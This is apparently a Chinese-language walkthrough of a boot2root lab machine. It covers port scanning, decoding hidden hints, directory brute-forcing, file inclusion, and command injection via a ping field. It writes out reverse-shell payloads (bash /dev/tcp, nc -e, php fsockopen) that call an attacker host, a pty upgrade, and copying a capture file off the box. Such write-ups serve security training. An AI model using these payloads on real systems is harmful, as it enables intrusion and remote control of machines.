备忘录,仅用来记录一些操作,具体环境可以参考红日安全
信息搜集
确定ip地址
由于采用NAT模式,靶机ip地址一定在Vmware的NAT网段下。
nmap -sP 192.168.31.0/24 [-oN filename]
or:
netdiscover
从而确定IP地址: 192.168.31.144
端口扫描
nmap -p1-65535 -sV [-oN filename] 192.168.31.144
nmap -Pn -sV -p- 192.168.31.144
扫描结果如下:
1 | PORT STATE SERVICE VERSION |
33447端口存在Web服务。
服务识别
仅仅发现Web服务,所以只能从Web服务入手。
端口: TCP 33447
Web服务器: Apache 2.4.10
操作系统: Ubuntu
漏洞挖掘
查看源码
发现首页最后一行存在注释 0x643239334c6d70775a773d3d
,转化成字符串如下:
1 | >>> libnum.n2s(0x643239334c6d70775a773d3d) |
一看就知道是Base64。
1 | ht@DESKTOP-GUA7PSI:/mnt/d$ echo d293LmpwZw== | base64 -d |
直接访问http://192.168.31.144:33447/wow.jpg
,返回404。
凭经验尝试了一下http://192.168.31.144:33447/images/wow.jpg
,返回一张图片。
通过strings
命令查看图片,发现新的提示:
1 | ht@DESKTOP-GUA7PSI:/mnt/c/Users/ht/Desktop$ strings wow.jpg | tail -n 4 |
将最后一行数字转为字符串:
1 | >>> ''.join([chr(int('0x'+i, 16)) for i in "37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34".split(":")]) |
通过猜测,7aee0f6d588ed9905ee37f16a7c610d4
应该是一串md5值。通过cmd5.com查询,得到值63425
。暂时不知道是什么东西。
使用Dirbuster爆破目录
依次尝试/Challenge/cake.php
, /Challenge/include.php
, /Challenge/index.php
。
其中cake.php
需要登录。查看源码title
标签,可以发现新的目录Magic_box
。
include.php
则存在文件包含漏洞,可以通过输入/etc/passwd
来测试。
继续爆破”/Challenge/Magic_box“目录,发现新的页面command.php
, low.php
。
命令执行
/Challenge/Magic_box
很明显存在命令执行漏洞,通过尝试输入127.0.0.1;ls
, 可以发现当前目录下所有文件.
1 | command.php |
查看command.php
源码。
1 | <?php |
反弹shell+提权
payload1: 127.0.0.1;/bin/bash -i >& /dev/tcp/192.168.31.130/1234 0>&1
失败。
payload2: 127.0.0.1;nc -e /bin/bash -d 192.168.31130 1234
失败。
payload3: 127.0.0.1;php -r '$sock=fsockopen("192.168.31.130",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
成功。
1 | root@kali:~# nc -lvnp 1234 |
提权,执行su
命令,发现无法执行,需要从一个终端,才能执行su
命令:
1 | $ su |
解决方法,使用python调用本地shell
。
1 | echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py |
结果如下:
1 | $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py |
查看/etc/passwd
,发现需要关注的用户有如下几个:root
, saman
, acid
。
分别查看每个用户的文件:
find / -user acid 2 >/dev/null
1 | www-data@acid:/var/www/html/Challenge/Magic_Box$ find / -user acid 2>/dev/null |
将hint.pcapng
拷贝到自己电脑上。
1 | scp /sbin/raw_vs_isi/hint.pcapng root@192.168.31.130:/root/Desktop/ |
找到 saman
的密码1337hax0r
。
1 | www-data@acid:/var/www/html/Challenge/Magic_Box$ su saman |